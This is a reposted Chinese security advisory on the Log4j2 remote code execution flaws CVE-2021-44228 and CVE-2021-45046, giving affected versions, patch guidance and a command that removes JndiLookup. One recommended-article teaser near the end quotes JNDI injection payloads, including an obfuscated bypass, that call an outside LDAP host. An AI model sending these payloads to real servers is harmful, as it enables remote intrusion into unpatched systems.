Loading [MathJax]/jax/output/CommonHTML/config.js
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >【漏洞通告】Apache Log4j2 远程代码执行漏洞(CVE-2021-44228/CVE-2021-45046)

【漏洞通告】Apache Log4j2 远程代码执行漏洞(CVE-2021-44228/CVE-2021-45046)

作者头像
Linux运维技术之路
发布于 2022-06-07 01:36:46
发布于 2022-06-07 01:36:46
2.4K00
代码可运行
举报
运行总次数:0
代码可运行

近日,阿里云计算有限公司发现阿帕奇Log4j2组件存在远程代码执行漏洞,并将漏洞情况告知阿帕奇软件基金会。2021年12月10日,阿里云安全团队发现 Apache Log4j 2.15.0-rc1 版本存在漏洞绕过。2021年12月15日,Apache官方发布Log4j 2.16.0 以及 2.12.2 版本,修复CVE-2021-45046 Apache Log4j 拒绝服务与远程代码执行漏洞

时间线

  • 2021年12月9日,阿里云安全团队发布 Apache Log4j2 远程代码执行漏洞(CVE-2021-44228) 安全通告
  • 2021年12月10日,阿里云安全团队发现绕过,更新建议修复版本为 Apache Log4j 2.15.0 及其以上。
  • 2021年12月15日,阿里云安全团队更新安全建议,更新建议修复版本为 Apache Log4j 2.16.0 以及 Apache Log4j 2.12.2 安全版本。
  • 最新安全问题请关注

漏洞描述

Apache Log4j2是一款优秀的Java日志框架。近日,阿里云计算有限公司发现阿帕奇Log4j2组件存在远程代码执行漏洞,并将漏洞情况告知阿帕奇软件基金会。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。漏洞利用无需特殊配置,经阿里云安全团队验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。2021年12月10日,阿里云安全团队发现 Apache Log4j 2.15.0-rc1 版本存在漏洞绕过,2021年12月15日,Apache官方发布Log4j 2.16.0 以及 2.12.2 版本,修复CVE-2021-45046 Apache Log4j 拒绝服务与远程代码执行漏洞。阿里云应急响应中心提醒 Apache Log4j2 用户尽快采取安全措施阻止漏洞攻击。

漏洞评级

CVE-2021-44228 Apache Log4j 远程代码执行漏洞 严重

CVE-2021-45046 Apache Log4j 拒绝服务与远程代码执行漏洞 严重

影响版本

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制

注:Apache Log4j 1.x 版本不受此次漏洞影响。


CVE-2021-44228 Apache Log4j 远程代码执行漏洞:

Apache Log4j 2.x >=2.0-beta9 且 < 2.15.02.12.2 版本不受影响)


CVE-2021-45046 Apache Log4j 拒绝服务与远程代码执行漏洞:

Apache Log4j 2.x >=2.0-beta9 且 < 2.16.02.12.2 版本不受影响)

安全建议(以下任何修复方案均需要重启应用)

  • 1、排查应用是否引入了Apache log4j-core Jar包,若存在依赖引入,且在受影响版本范围内,则可能存在漏洞影响。同时为了避免在Apache Log4j 2.15.0版本中某些自定义配置而可能导致的JNDI注入或拒绝服务攻击,请尽快升级Apache Log4j2所有相关应用到 2.16.0 或者 2.12.2 及其以上版本,地址 https://logging.apache.org/log4j/2.x/download.html 。
  • 2、对于 Java 8 及其以上用户,建议升级 Apache Log4j2 至 2.16.0 版本。
  • 3、对于 Java 7 用户,建议升级至 Apache Log4j 2.12.2 版本,该版本为安全版本,用于解决兼容性问题。
  • 4、对于其余暂时无法升级版本的用户,建议删除JndiLookup,可用以下命令

zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

  • 5、升级已知受影响的应用及组件,如 spring-boot-starter-log4j2/Apache Struts2/Apache Solr/Apache Druid/Apache Flink
  • 6、其余临时缓解方案可参见 https://logging.apache.org/log4j/2.x/security.html 。目前已有安全版本,强烈建议不要采用临时缓解方案进行防御。

相关链接

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制

1、https://logging.apache.org/log4j/2.x/security.html

2、https://github.com/advisories/GHSA-jfh8-c2jp-5v3q

3、https://avd.aliyun.com/detail?id=AVD-2021-920285

4、https://avd.aliyun.com/detail?id=AVD-202
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-12-20,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Linux运维技术之路 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
卧槽!Log4j2 再爆雷,Log4j v2.17.0 横空出世。。。
Log4j2 这是没完没了了,栈长以为《玩大了!Log4j 2.x 再爆雷。。。》 Log4j 2.16.0 是最终终结版本了,没想到才过多久又爆雷了:
Java技术栈
2021/12/22
1.6K0
卧槽!Log4j2 再爆雷,Log4j v2.17.0 横空出世。。。
[漏洞复现]log4j漏洞RCE(CVE-2021-44228)
这里做一个复现学习的小文章,由于对java这方面的知识雀食是薄弱,而且本地复现时,出现了挺多问题,在本地复现时,不知道是什么原因,利用payload去打的时候,总是说loggxxx模块不存在...idea也犯毛病...果断直接用网上的靶机去复现一波
vFREE
2021/12/20
15.5K0
[漏洞复现]log4j漏洞RCE(CVE-2021-44228)
log4j2(CVE-2021-44228)漏洞复现实操(小白向)
Apache Log4j 2 是对 Log4j 的升级,它比其前身 Log4j 1.x 提供了显着改进,并提供了 Logback 中可用的许多改进,同时修复了 Logback 架构中的一些固有问题。
网e渗透安全部
2022/06/15
6.9K0
log4j2(CVE-2021-44228)漏洞复现实操(小白向)
【安全通告】Apache Log4j 2 远程代码执行漏洞(CVE-2021-45046)
腾讯云安全运营中心监测到, Apache Log4j 由于非默认配置下对CVE-2021-44228修复措施不完善,导致在某些特殊配置场景下,可被攻击者利用造成远程代码执行攻击。 为避免您的业务受影响,腾讯云安全建议您及时开展安全自查,如在受影响范围,请您及时进行更新修复,避免被外部攻击者入侵。 漏洞详情 Apache Log4j 2 是一个开源的日志记录组件,是 Apache Log4j 的升级版,它可以控制每一条日志的输出格式,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。 继202
云鼎实验室
2021/12/20
7750
适配Apache Log4j2更新,发布Elasticsearch和Logstash的7.16.2和6.8.22版本
我们很高兴地宣布 Elasticsearch(7.16.2) 和 Logstash(6.8.22) 的新版本发布,本次发布将升级到最新版本的 Apache Log4j 2.17.0,并解决一些漏洞扫描器的误报问题。Elastic 还会通过我们的咨询主页保持持续更新,以确保我们的客户和社区能够及时了解最新发展。
点火三周
2021/12/20
5.3K0
适配Apache Log4j2更新,发布Elasticsearch和Logstash的7.16.2和6.8.22版本
【安全通告】Apache log4j2 远程代码执行漏洞风险通告(CVE-2021-44832)
腾讯云安全运营中心监测到,Apache Log4j2 官方发布公告提示其在某些特殊场景下存在远程代码执行漏洞,漏洞编号CVE-2021-44832。该漏洞仅在攻击者拥有修改配置文件权限时才可远程执行任意代码,漏洞利用难度较大。 为避免您的业务受影响,腾讯云安全建议您及时开展安全自查,如在受影响范围,请您及时进行更新修复,避免被外部攻击者入侵。 漏洞详情 Apache Log4j2 是一个基于Java的开源日志记录框架,该框架重写了Log4j框架,是其前身Log4j 1.x 的重写升级版,并且引入了大量丰富
云鼎实验室
2021/12/30
2.2K0
Apache Log4j2 高危漏洞应急响应处置方法汇总整理
Apache Log4j2是一款优秀的Java日志框架。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。
yuanfan2012
2021/12/14
5.7K0
Apache Log4j2 高危漏洞应急响应处置方法汇总整理
Log4j 再发 2.16.0 新版,彻底移除 Message Lookups;一行配置轻松升级
近一周,可能是Log4j团队最忙的一周了;因为上周爆出来的核弹级Bug,在短短的一个星期时间内,连推了两个大版本,来修复此漏洞;
一行Java
2022/04/07
2930
Log4j 再发 2.16.0 新版,彻底移除 Message Lookups;一行配置轻松升级
系统安全通知:关于近期Apache Log4j2执行漏洞
近日,WebRAY安全服务部监测到Apache Log4j2存在远程代码执行漏洞(CVE-2021-44228),通过构造恶意的代码即可利用该漏洞,从而导致服务器权限丢失。
知行软件EDI
2021/12/14
5520
系统安全通知:关于近期Apache Log4j2执行漏洞
Apache Log4j 2 远程代码执行漏洞详解
2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。2021年12月10日,阿里云安全团队发现 Apache Log4j 2.15.0-rc1 版本存在漏洞绕过,请及时更新至 Apache Log4j 2.15.0 正式版本。
SimpleAstronaut
2022/08/09
1K0
Apache Log4j 2 远程代码执行漏洞详解
没完没了,Apache Log4j:你爆我也爆!
最近,Apache Log4j日志库中发现了另一个严重的远程代码执行漏洞,现在被跟踪为 CVE-2021-44832。这是 Log4j 库中的第三个 RCE 和第四个漏洞,其次分别是 CVE-2021-44228 (RCE)、CVE-2021-45046 (RCE) 和 CVE-2021-45105 (DoS 攻击)。
终码一生
2022/04/15
3070
Log4j 持续爆雷,啥时候是个头?
据媒体报道,近期工信部网络安全管理局通报称,阿里云计算有限公司(以下称:阿里云)在 11 月 24 日发现了 Log4j2 安全漏洞隐患后率先向 Apache 基金会披露了该漏洞,未及时向中国工信部通报相关信息,未有效支撑工信部开展网络安全威胁和漏洞管理。经研究,工信部网络安全管理局决定暂停阿里云作为上述合作单位 6 个月。暂停期满后,根据阿里云整改情况,研究恢复其上述合作单位。
深度学习与Python
2022/03/01
3790
Log4j 持续爆雷,啥时候是个头?
服了!Log4j2 再再爆雷,Log4j v2.17.0 横空出世。。。
该工具重写了 Log4j 框架,并且引入了大量丰富的特性,该框架被大量用于业务系统开发,用来记录日志信息。
纯洁的微笑
2021/12/21
8220
服了!Log4j2 再再爆雷,Log4j v2.17.0 横空出世。。。
半壁互联网江山都中招!开源软件被曝“十年最重大漏洞”,维护人竟只有3名志愿者
就在前两天,全球知名开源日志组件Apache开源项目Log4j远程代码执行漏洞细节被公开。
大数据文摘
2021/12/15
7430
半壁互联网江山都中招!开源软件被曝“十年最重大漏洞”,维护人竟只有3名志愿者
Log4J2的瓜
Apache Log4J2"核弹级"的安全漏洞,简单而言即运行Log4J 的2.0~2.14.1版本的服务器,攻击者可以利用这个漏洞执行任何代码。
SQLplusDB
2022/08/22
7080
Log4J2的瓜
又又又来了!Apache Log4j 被曝本月第 4 个漏洞
继本月上旬 Apache Log4j2 中的远程代码执行漏洞被首次曝光后,后续又有多个漏洞相继曝光,并在全球范围内造成了影响。
51Aspx
2021/12/31
3430
又又又来了!Apache Log4j 被曝本月第 4 个漏洞
【核弹级漏洞】Apache Log4j 远程代码执行漏洞以及修复建议
2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。
HACK学习
2021/12/14
1.6K0
【核弹级漏洞】Apache Log4j 远程代码执行漏洞以及修复建议
Log4j-JNDI注入RCE
漏洞简介 影响版本 Apache Log4j 2.14.1 Apache Log4j Security Vulnerabilities log4shell - Quick Guide 漏洞利用 Log4j 2.14.1 - RCE CVE-2021-44228 POC ${jndi:ldap://xxx.dnslog.cn/exp} # Bypass ${j${lower:n}di:l${lower:d}ap://xxx.dnslog.cn/exp} RCE 首先Netcat监听端口 $ nc -lvn
Naraku
2022/02/24
1.9K0
Log4j-JNDI注入RCE
使用 Elastic Security 检测 CVE-2021-44228 (log4j2) 的漏洞利用
这篇博文提供了 CVE-2021-44228 的摘要,并为 Elastic Security 用户提供了检测,以发现他们环境中对该漏洞的主动利用。
点火三周
2021/12/11
5.1K0
使用 Elastic Security 检测 CVE-2021-44228 (log4j2) 的漏洞利用
Apache Log4j 远程代码执行漏洞源码级分析
2021 年 12 月 9 日,2021 年 11 月 24 日,阿里云安全团队向 Apache 官方报告了 Apache Log4j2 远程代码执行漏洞。详情见 【漏洞预警】Apache Log4j 远程代码执行漏洞
Yano_nankai
2022/03/24
4290
Apache Log4j 远程代码执行漏洞源码级分析
推荐阅读
相关推荐
卧槽!Log4j2 再爆雷,Log4j v2.17.0 横空出世。。。
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验